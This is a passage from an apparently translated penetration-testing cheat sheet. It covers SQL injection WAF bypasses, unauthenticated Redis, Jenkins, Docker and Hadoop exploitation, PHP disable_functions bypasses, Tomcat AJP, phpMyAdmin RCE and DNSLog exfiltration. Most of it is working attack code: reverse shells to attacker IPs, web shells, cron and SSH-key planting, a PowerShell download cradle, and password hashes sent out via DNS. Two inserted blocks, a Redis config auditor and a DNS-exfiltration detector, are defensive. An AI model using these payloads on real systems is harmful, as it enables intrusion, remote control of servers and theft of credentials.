<> filtered: id=1 and ascii(substr(database(),0,1))>64
Comparison: greatest(n1,n2,n3,...) returns the largest of its arguments: id=1 and greatest(ascii(substr(database(),0,1)),64)=64
Function construction: sleep(5) / benchmark(10000000,SHA1(1))
id=1 xor sleep%23%0a(5)
id=1 xor sleep%2d%2d%0a(5)
id=1 xor sleep([%20]5)
id=1 xor benchmark%0a(10000000,SHA1(1))
id=1 xor sleep[whitespace](5)
select{x[padding characters]1}
MSSQL
Comments: /*, --, ;00%, /**/
Whitespace: [0x01-0x20][0x0a-0x0f][0x1a-0x1f]
Special symbols: %3a (colon)
id=1 union:select 1,2 from:admin
id=1unionselect+1,'2',db_name() from admin
id=1unionselect-1,'2',db_name() from admin
id=1unionselect.1,'2',db_name() from admin
id=1unionselect:1,'2',db_name() from admin
id=1unionselect~1,'2',db_name() from admin
id=1%20union%20select%201,'2',db_name()%80from%20admin
id=1unionselect 1,'2',db_name+() from admin
Function variants: db_name[whitespace]()
Floating-point numbers:
id=1.1union select 1,'2',db_name()
id=1e0union select 1,'2',db_name()
Operators:
id=1-1union select '1',system_user,3 from admin
id=1e-union select '1',system_user,3 from admin
Substring functions: Substring(@@version,1,1) Left(@@version,1) Right(@@version,1) charindex('test',db_name())
Conversion functions: Ascii('a')=char(97); spaces may be inserted between the parentheses
WAF
Submit GET and POST at the same time; access over HTTP to bypass protection applied only to HTTPS; %00 truncation; pad parameters with junk data (buffer overflow); forge X-Forwarded-For; static-file bypass /sql.php/1.js?id=1; whitelist bypass, where the URL is not blocked as long as it contains a certain string: /sql.php/admin.php?id=1, /sql.php?a=/manage/&b=../etc/passwd, /../../../manage/../sql.asp?id=2; forge the User-Agent, e.g. a crawler's.

          未授權訪問

          Redis未授權訪問
          測試
          >redis-cli -h 127.0.0.1 flunshall192.168.0.110:6379>pingPONG 存在未授權訪問
          Reaching the intranet instance from JavaScript
          var cmd = new XMLHttpRequest();
          cmd.open("POST", "http://127.0.0.1:6379");
          cmd.send('flushall\r\n');

          var cmd = new XMLHttpRequest();
          cmd.open("POST", "http://127.0.0.1:6379");
          cmd.send('eval \'' + 'redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/外網IP/5566 0>&1\\n\\n");redis.call(\"config\", \"set\", \"dir\",\"/var/spool/cron/\"); redis.call(\"config\",\"set\", \"dbfilename\", \"root\");' + '\' 0' + "\r\n");

          var cmd = new XMLHttpRequest();
          cmd.open("POST", "http://127.0.0.1:6379");
          cmd.send('save\r\n');
          Reverse shell
          Save the following as a shell script:
          echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.108/12138 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1
          echo -e "\n\n */1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.108\",12138));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h $1 -p $2 -x set 1
          redis-cli -h $1 -p $2 config set dir /var/spool/cron/
          redis-cli -h $1 -p $2 config set dbfilename root
          redis-cli -h $1 -p $2 save
          redis-cli -h $1 -p $2 quit
          Run it:
          >bash 1.sh 192.168.0.120 6379


          Writing a web shell
          6379> config set dir /var/www/html/
          6379> config set dbfilename shell.php
          6379> set x "<?php phpinfo();?>"
          6379> save
          SSH
          Generate a key pair locally with ssh-keygen (https://github.com/JoyChou93/hackredis)
          >ssh-keygen -t rsa -C "xx@xx.com"
          >(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > qq.txt
          >redis-cli -h 127.0.0.1 flushall
          >cat qq.txt | redis-cli -h 127.0.0.1 -x set crackit
          >redis-cli -h 127.0.0.1
          6379> config set dir /root/.ssh/
          6379> config set dbfilename "authorized_keys"
          6379> save
          Log in from the local machine:
          #ssh -i id_rsa root@11.11.11.11
          redis-rogue-getshell
          https://github.com/vulhub/redis-rogue-getshell
          Requires Python 3.0 or later. Build:
          >cd RedisModulesSDK/
          >make
          This produces exp.so in that directory. Run the command:
          >python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
          redis-rogue-server
          https://github.com/n0b0dyCN/redis-rogue-server
          Requires Python 3.6 or later. Build:
          >cd RedisModulesSDK/exp
          >make
          Run:
          >./redis-rogue-server.py --rhost 192.168.0.120 --lhost 192.168.0.108


          A reverse shell is also possible.


          Exploiting Redis on Windows
          Write a web shell into the web directory
          Startup folder
          System DLL hijacking (takes effect when the target reboots or logs off)
          DLL hijacking of specific software
          Overwrite shortcuts
          Overwrite configuration files
          Overwrite sethc.exe and similar files
          https://github.com/r35tart/RedisWriteFile
          >python3 rediswritefile.py --rhost=<target IP> --rport=6379 --lhost=<local IP> --lport=<local port> --rpath="<directory on the target>" --rfile="<file name on the target>" --lfile="<local file>" --auth=<redis password>
          Lua RCE
          https://github.com/QAX-A-Team/redis_lua_exploit
          Set host in redis_lua.py to the target IP and run it. If it returns normally, get a reverse shell with:
          >eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0
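          Every Redis technique above (cron, SSH key and web-shell writes via CONFIG SET dir/dbfilename, the Lua eval, the rogue-server MODULE LOAD) depends on the server accepting those commands from the network without a password. As an added defensive example, not part of the original notes, here is a small redis.conf audit that reports exactly those weaknesses, with a constructed weak and a constructed hardened configuration; directive names are the real redis.conf ones, the function names are mine.

```python
# Commands the attacks above rely on; renaming them to "" removes them entirely.
ABUSED_COMMANDS = ("CONFIG", "FLUSHALL", "EVAL", "EVALSHA", "MODULE", "DEBUG")
LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}

def parse_redis_conf(text: str):
    """Return ({directive: value}, {ORIGINAL_COMMAND: new_name}) from redis.conf text."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip().strip('"')
        if key == "rename-command":
            orig, _, new = value.partition(" ")
            renamed[orig.upper()] = new.strip().strip('"')
        else:
            directives[key] = value
    return directives, renamed

def audit_redis_conf(text: str) -> list:
    """List the weaknesses that make the attacks above possible; [] means none found."""
    conf, renamed = parse_redis_conf(text)
    findings = []
    bind = conf.get("bind", "").split()
    if not bind or any(addr in ("0.0.0.0", "*", "::") for addr in bind):
        findings.append("bind: listens on all interfaces")
    elif not set(bind) <= LOOPBACK:
        findings.append("bind: reachable from other hosts (%s)" % " ".join(bind))
    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")
    if not conf.get("requirepass"):
        findings.append("requirepass: not set")
    for cmd in ABUSED_COMMANDS:
        if cmd not in renamed:
            findings.append("rename-command: %s still callable under its real name" % cmd)
    # Redis 7 refuses CONFIG SET dir/dbfilename unless this is explicitly switched on.
    if conf.get("enable-protected-configs", "no").lower() == "yes":
        findings.append("enable-protected-configs: dir/dbfilename changeable at runtime")
    return findings

# Constructed example: a default-style install exposed to the network.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed example: loopback only, password required, abusable commands removed.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "use-a-long-random-secret-here"
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command EVAL ""
rename-command EVALSHA ""
rename-command MODULE ""
rename-command DEBUG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or "no findings")
```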
          Jenkins unauthorized access
          http://www.qq.com:8080/manage
          http://www.qq.com:8080/script
          Run a command:
          >println "ifconfig -a".execute().text
          Reverse shell:
          >println "wget http://your.com/back.py -P /tmp/".execute().text
          >println "python /tmp/back.py yourIP 8080".execute().text
          Write a web shell:
          >println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text
          >new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);?>');
          >def webshell = '<?php @eval($_POST[1]);?>'
          >new File("/var/www/html/1.php").write("$webshell");
          MongoDB unauthorized access
          Default port 27017. Connect directly and perform CRUD operations.
          Client tool: https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe
          ZooKeeper unauthorized access
          Default port 2181
          Get server environment information:
          >echo envi|nc 192.168.0.1 2181
          Connect:
          >./zkCli.sh -server ip:port
          Client tool: https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
          Elasticsearch unauthorized access
          Default port 9200
          http://1.1.1.1:9200/_plugin/head/
          http://1.1.1.1:9200/_nodes
          http://1.1.1.1:9200/_river
          http://1.1.1.1:9200/_plugin/sql/
          Memcache unauthorized access
          Default port 11211
          >telnet 1.1.1.1 11211
          >nc -vv 1.1.1.1 11211
          Hadoop unauthorized access
          http://192.168.1.1:8088/cluster
          Listen on a local port >> create an application >> submit it through the Submit Application API
          #!/usr/bin/env python
          import requests

          target = 'http://192.168.18.129:8088/'
          lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999

          url = target + 'ws/v1/cluster/apps/new-application'
          resp = requests.post(url)
          app_id = resp.json()['application-id']
          url = target + 'ws/v1/cluster/apps'
          data = {
              'application-id': app_id,
              'application-name': 'get-shell',
              'am-container-spec': {
                  'commands': {
                      'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
                  },
              },
              'application-type': 'YARN',
          }
          requests.post(url, json=data)
          Docker unauthorized access
          Default port 2375
          >docker -H tcp://1.1.1.1:2375 images
          Start a listener locally, then start a container:
          docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latest
          docker -H tcp://1.1.1.1:2375 ps
          Enter the container:
          docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb sh
          echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root   # add a cron job
          cat /tmp/root
          exit
          Shipyard default credentials: admin/shipyard
          ActiveMQ unauthorized access
          Default port 8161
          http://1.1.1.1:8161/admin/connections.jsp
          PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
          Content-Length: 27
          Host: 1.1.1.1:8161
          Connection: Close
          Authorization: Basic YWRtaW46YWRtaW4=

          123123123123123123123123123
          JBoss unauthorized access
          http://192.168.1.1:8080/jmx-console/ can be opened without authentication. Deploy a shell through jboss.deployment: set the paramValue of addURL() to the URL of a remote WAR containing the shell.

          Exploiting leaked Aliyun OSS keys

          Decompile the app and look for files that may contain OSS keys, such as JS (OSSAccessKey, AccessKeySecret). Access the buckets with an OSS browser. The third-party tool 行云管家 can change the system password.
          Reverse shell
          From: https://xz.aliyun.com/t/8310
          https://api.aliyun.com/#/?product=Ecs
          Search for and select CreateCommand to create a command. CommandContent takes the base64 of the command and Type is RunShellScript.
          Command:
          echo "bash -i >& /dev/tcp/你的IP/端口 0>&1"| base64
          bash -i >& /dev/tcp/你的IP/端口 0>&1
          YmFzaCAtaSAmZ3Q7JiAvZGV2L3RjcC8xLjEuMS4xLzQ0NDQgMCZndDsmMQ==
          After filling it in, click Debug SDK; a Cloud Shell is opened for you directly
          and a CreateCommand.py file is created. Edit it with vi,
          fill in accessKeyId and accessSecret, save, run it, and record the CommandId.
          Search for InvokeCommand in the search box again.
          CommandId is the value returned by the previous request; InstanceId is the instance ID shown in 行云管家.
          Once filled in, click Debug SDK, edit the file to fill in accessKeyId and accessSecret, and run it.
          The listening server then receives the reverse shell.

          Bypassing disable_functions on Linux

          LD_PRELOAD
          Linux, with putenv() and mail() available
          https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
          http://192.168.0.107/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
          outpath is where the command output is written and sopath is the path of the .so file. Alternatively, replace mail in the PHP file with error_log("a",1);
          php7.0-7.3 bypass
          Direct bypass: https://raw.githubusercontent.com/mm0r1/exploits/master/php7-gc-bypass/exploit.php
          Windows: bypass through the COM system component
          <?php
          $command = $_GET['cmd'];
          $wsh = new COM('WScript.shell'); // create a COM object; Shell.Application also works
          $exec = $wsh->exec("cmd /c".$command); // call the object's method to run the command
          $stdout = $exec->StdOut();
          $stroutput = $stdout->ReadAll();
          echo $stroutput;
          ?>
          CGI startup mode
          Search phpinfo for "server api": it is either cgi or fastcgi.
          If it is cgi mode, upload the following .htaccess:
          Options ExecCGI
          AddHandler cgi-script .xx
          Windows:
          #!C:/Windows/System32/cmd.exe /c start calc.exe
          1
          Linux:
          #!/bin/bash
          echo -ne "Content-Type: text/html\n\n"
          whoami
          If it is fast_cgi, upload the following .htaccess:
          Options +ExecCGI
          AddHandler fcgid-script .abc
          FcgidWrapper "C:/Windows/System32/cmd.exe /c start cmd.exe" .abc
          Then upload any file with the .abc extension.
          Relative paths:
          AddHandler fcgid-script .html
          FcgidWrapper "../../php/php7.3.4nts/php-cgi.exe" .html
          AddHandler fcgid-script .xx
          FcgidWrapper "../../../WWW/localhost/calc.exe" .xx
          ImageMagick component bypass
          ImageMagick version v6.9.3-9 or v7.0.1-0
          First method (the fill line is the part that triggers the command):
          <?php
          echo "Disable Functions: " . ini_get('disable_functions') . "\n";
          $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
          if ($command == '') {
              $command = 'id';
          }
          $exploit = <<<EOF
          push graphic-context
          viewbox 0 0 640 480
          fill 'url(https://example.com/image.jpg"|$command")'
          pop graphic-context
          EOF;
          file_put_contents("KKKK.mvg", $exploit);
          $thumb = new Imagick();
          $thumb->readImage('KKKK.mvg');
          $thumb->writeImage('KKKK.png');
          $thumb->clear();
          $thumb->destroy();
          unlink("KKKK.mvg");
          unlink("KKKK.png");
          ?>
          Second method
          #include <stdlib.h>
          #include <string.h>
          void payload() {
              const char* cmd = "nc -e /usr/bin/zsh 127.0.0.1 4444";
              system(cmd);
          }
          int fileno() {
              if (getenv("LD_PRELOAD") == NULL) { return 0; }
              unsetenv("LD_PRELOAD");
              payload();
              return 0;
          }
          Compile: gcc -shared -fPIC imag.c -o imag.so
          <?php
          putenv('LD_PRELOAD=/var/www/html/imag.so');
          $img = new Imagick('/tmp/1.ps');
          ?>
          Bypass with the usual execution functions
          <?php echo exec('whoami'); ?>
          ------------------------------------------------------
          <?php echo shell_exec('whoami'); ?>
          ------------------------------------------------------
          <?php system('whoami'); ?>
          ------------------------------------------------------
          <?php passthru("whoami"); ?>
          ------------------------------------------------------
          <?php
          $command=$_POST['cmd'];
          $handle = popen($command , "r");
          while(!feof($handle)){
              echo fread($handle, 1024);  //fread($handle, 1024);
          }
          pclose($handle);
          ?>
          -------------------------------------------------------
          <?php
          $command="ipconfig";
          $descriptorspec = array(1 => array("pipe", "w"));
          $handle = proc_open($command ,$descriptorspec , $pipes);
          while(!feof($pipes[1])){
              echo fread($pipes[1], 1024); //fgets($pipes[1],1024);
          }
          ?>
          pcntl_exec
          Requires the pcntl extension; PHP 4 >= 4.2.0 or PHP 5; Linux
          <?php
          if(function_exists('pcntl_exec')) {
              pcntl_exec("/bin/bash", array("/tmp/test.sh"));
          } else {
              echo 'pcntl extension is not support!';
          }
          ?>
          test.sh:
          #!/bin/bash
          nc -e /bin/bash 1.1.1.1 8888       # reverse shell
          imap_open function
          <?php
          error_reporting(0);
          if (!function_exists('imap_open')) {
              die("no imap_open function!");
          }
          $server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";
          imap_open('{' . $server . ':143/imap}INBOX', '', '');
          sleep(5);
          echo file_get_contents("/tmp/cmd_result");
          ?>
          PHP 7.4 FFI bypass
          PHP 7.4 with ffi.enable=true
          <?php
          $a='nc -e /bin/bash ip 8888';
          $ffi = FFI::cdef(
              "int system(char *command);",
              "libc.so.6");
          $ffi->system($a);
          ?>
          shellshock
          Requires CVE-2014-6271; PHP 5.*, Linux, with putenv() and mail() available
          <?php
          function shellshock($cmd) {
              $tmp = tempnam(".","data");
              putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
              mail("a@127.0.0.1","","","","-bv");
              $output = @file_get_contents($tmp);
              @unlink($tmp);
              if($output != "") return $output;
              else return "No output, or not vuln.";
          }
          echo shellshock($_REQUEST["cmd"]);
          ?>
          AntSword plugins
          01 Using the LD_PRELOAD environment variable
          02 Using ShellShock (CVE-2014-6271)
          03 Using Apache mod_cgi
          04 PHP-FPM with the LD_PRELOAD environment variable (same as 01)
          05 Attacking the PHP-FPM listening port
          06 Json Serializer UAF
          07 PHP7 GC with certain destructors UAF

          open_basedir bypass

          First method
          http://x.com/shell.php?a=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');};
          http://x.com/shell.php?a=if%20(%20$b%20=%20opendir(%22glob:///var/www/html/*.php%22)%20)%20{while%20(%20($file%20=%20readdir($b))%20!==%20false%20)%20{echo%20%22filename:%22.$file.%22\n%22;}closedir($b);}
          Second method
          http://x.com/shell.php?a=ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');system('cat ../../../../../etc/passwd');
          http://x.com/shell.php?a=mkdir(%22/tmp/crispr%22);chdir(%27/tmp/crispr/%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_r(scandir(%27.%27))
          Third method: command execution
          Reading a file after the bypass:
          ?a=show_source('preload.php');
          ?a=echo(readfile('preload.php'));
          ?a=print_r(readfile('preload.php'));
          ?a=echo(file_get_contents('preload.php'));
          ?a=print_r(file_get_contents('preload.php'));

          Tomcat AJP LFI & RCE

          LFI
          https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
          >python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass
          RCE
          >msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.107 LPORT=12138 R >/var/www/html/1.jpg
          Get the file onto the server through the target's file-upload function.
          >java -jar ajpfuzzer_v0.6.jar
          >connect 192.168.0.110 8009
          >forwardrequest 2 "HTTP/1.1" "/index.jsp" 192.168.0.107 192.168.0.107 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:index.jsp","javax.servlet.include.path_info:/1.jpg","javax.servlet.include.servlet_path:/"

          Reading client files through a MySQL connection

          https://github.com/Gifts/Rogue-MySql-Server
          The client must have LOCAL-INFILE enabled and support non-SSL connections, and the target web application must expose a script such as adminer that tests a database connection. Run the Python script below on the attacking machine to stand up a fake MySQL server, make the target web application connect to it, and read the file.
          #coding=utf-8
          import socket
          import logging
          logging.basicConfig(level=logging.DEBUG)
          filename="/etc/passwd"
          sv=socket.socket()
          sv.bind(("",3305))
          sv.listen(5)
          conn,address=sv.accept()
          logging.info('Conn from: %r', address)
          conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
          conn.recv(9999)
          logging.info("auth okay")
          conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
          conn.recv(9999)
          logging.info("want file...")
          wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
          conn.sendall(wantfile)
          content=conn.recv(9999)
          logging.info(content)
          conn.close()

          Enabling remote MySQL connections

          >grant all privileges on user.* to user@"%" identified by "P@ssw0rd";

          MSSQL & Agent Job callback

          USE msdb;
          exec dbo.sp_add_job @job_name = N'syspolicy_purge_now' ;
          exec sp_add_jobstep @job_name = N'syspolicy_purge_now', @step_name = N'syspolicy_purge_step1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;
          exec dbo.sp_add_jobserver @job_name = N'syspolicy_purge_now ';
          exec dbo.sp_start_job N'syspolicy_purge_now ';
          To use it at an injection point, URL-encode it with Burp and prefix the result with %20 (a URL-encoded space).

          Injection without column names

          http://url/index.php?id=1 order by 6
          http://url/index.php?id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -
          http://url/index.php?id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -

          DNSLog

          http://ceye.io
          http://www.dnslog.cn/
          Injection
          MYSQL
          Show the current database:
          ?id=1' and if((select load_file(concat('\\\\',(select database()),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          Show databases:
          ?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit {0},1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          Show tables:
          ?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='dbname' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          ?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=0x1x1x2x limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          Show columns:
          ?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          Show data:
          ?id=1' and if((select load_file(concat('\\\\',(select hex(user) from users limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
          MSSQL
          Query data:
          ?id=1;declare @host varchar(1024);select @host=(select master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';exec('master..xp_dirtree "\'%2b@host%2b'\foobar$"');
          sa password hash:
          ?id=1;DECLARE @host varchar(1024);select @host=(select TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.ip.port.b182oj.ceye.io';exec('master..xp_dirtree "\'+@host+'\foobar$"');
          Run a command:
          exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
          exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
          exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
          postgreSQL
          ?id=1;drop TABLE IF EXISTS table_output;
          CREATE TABLE table_output(content text);
          CREATE OR replace FUNCTION temp_function() RETURNS VOID AS $$ declare exec_cmd TEXT;declare query_result TEXT;BEGIN select INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;
          select temp_function();
          Oracle
          ?id=1 union select UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;
          ?id=1 union select DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;
          ?id=1 union select HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;
          ?id=1 union select UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;
          Command execution
          >curl http://0ox095.ceye.io/`whoami`
          >ping `whoami`.b182oj.ceye.io
          >ping %CD%.lfofz7.dnslog.cn
          &cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!"
          XXE
          <?xml version="1.0" encoding="UTF-8"?>
          <!DOCTYPE root [
          <!ENTITY % remote SYSTEM "http://b182oj.ceye.io/xxe_test">
          %remote;]>
          <root/>
          Struts
          xx.action?redirect:http://b182oj.ceye.io/%25{3*4}
          xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
          weblogic
          /uddiexplorer/SearchPublicRegistries.jsp?operator=http://b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
          Resin
          xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://b182oj.ceye.io/ssrf
          Discuz
          /forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
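          All of the DNSLog techniques above leave the same trace: a DNS query from an internal database or application host whose leftmost labels carry the exfiltrated value (hex from fn_varbintohexstr or hex(), a database name, a base64 chunk) under a public callback domain. As an added defensive example, not part of the original notes, here is a detector for resolver query logs; the log format is an assumed BIND-style line and the sample lines are constructed.

```python
import re
from collections import Counter

# Public DNS-log services named above: a query for a subdomain of one of these from an
# internal host is the alert by itself.
OOB_DOMAINS = ("ceye.io", "dnslog.cn")
HEX_LABEL = re.compile(r"^(0x)?[0-9a-f]{16,}$")
LONG_LABEL = 32   # labels this long are where hex/base64 exfil of a hash or password begins
# Assumed BIND-style query-log line: "<date> client <ip>#<port>: query: <name> IN <type>"
QUERY_LINE = re.compile(r"client (?P<src>[\d.:a-fA-F]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\w+)")

def classify_query(qname: str) -> list:
    """Return the reasons a queried name looks like DNS-based exfiltration ([] if none)."""
    name = qname.rstrip(".").lower()
    reasons = []
    if any(name == d or name.endswith("." + d) for d in OOB_DOMAINS):
        reasons.append("oob-domain")
    labels = name.split(".")
    if any(HEX_LABEL.match(label) for label in labels):
        reasons.append("hex-label")
    if any(len(label) >= LONG_LABEL for label in labels):
        reasons.append("long-label")
    return reasons

def scan_dns_log(lines):
    """Return ([(source, name, reasons), ...], Counter of hits per source)."""
    hits, per_source = [], Counter()
    for line in lines:
        m = QUERY_LINE.search(line)
        if not m:
            continue
        reasons = classify_query(m["name"])
        if reasons:
            hits.append((m["src"], m["name"], reasons))
            per_source[m["src"]] += 1
    return hits, per_source

# Constructed log lines: the first two mirror the MSSQL xp_dirtree and MySQL load_file patterns above.
SAMPLE_LOG = """\
12-Jan-2024 10:01:02.120 client 10.0.0.25#51234: query: 0x61646d696e313233.cece.nk40ci.ceye.io IN A
12-Jan-2024 10:01:03.001 client 10.0.0.25#51235: query: testdb.jhsefs.ceye.io IN A
12-Jan-2024 10:01:04.300 client 10.0.0.9#40001: query: www.example.com IN A
12-Jan-2024 10:01:05.777 client 10.0.0.31#40002: query: 3f2a9c8d1e4b7a60f19e2c4d5b6a7f80e1d2.cdn.internal.example IN TXT
"""

if __name__ == "__main__":
    hits, per_source = scan_dns_log(SAMPLE_LOG.splitlines())
    for src, name, reasons in hits:
        print(src, name, reasons)
    print(per_source.most_common())
```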

          PHPMyadmin

          General log
          show variables like '%general%';   # view the configuration
          set global general_log = on;   # enable the general log
          set global general_log_file = '/var/www/html/1.php';
          select '<?php eval($_POST[cmd]);?>'
          Slow query log
          show variables like '%slow%';
          set GLOBAL slow_query_log_file='C:/WWW/slow.php';
          set GLOBAL slow_query_log=on;
          set GLOBAL log_queries_not_using_indexes=on;
          select '<?php phpinfo();?>' from mysql.db where sleep(10);
          Arbitrary file read
          phpMyAdmin 2.x
          POST /scripts/setup.php HTTP/1.1
          Host: ip:8080
          Accept-Encoding: gzip, deflate
          Accept: */*
          Accept-Language: en
          User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
          Connection: close
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 80

          action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
          LFI
          phpMyAdmin 4.0.1-4.2.12, PHP < 5.3.4
          /gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00
          phpMyAdmin 4.8.0 and 4.8.1, requires backend access
          >select '<?php phpinfo();exit;?>'
          /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_***
          RCE
          phpMyAdmin 4.0.x-4.6.2, PHP 4.3.0-5.4.6, requires backend access
          >cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
          phpMyAdmin 4.8.0~4.8.3
          CREATE DATABASE foo;
          CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );
          insert INTO foo.bar select '<?php phpinfo(); ?>';
          Visit http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo
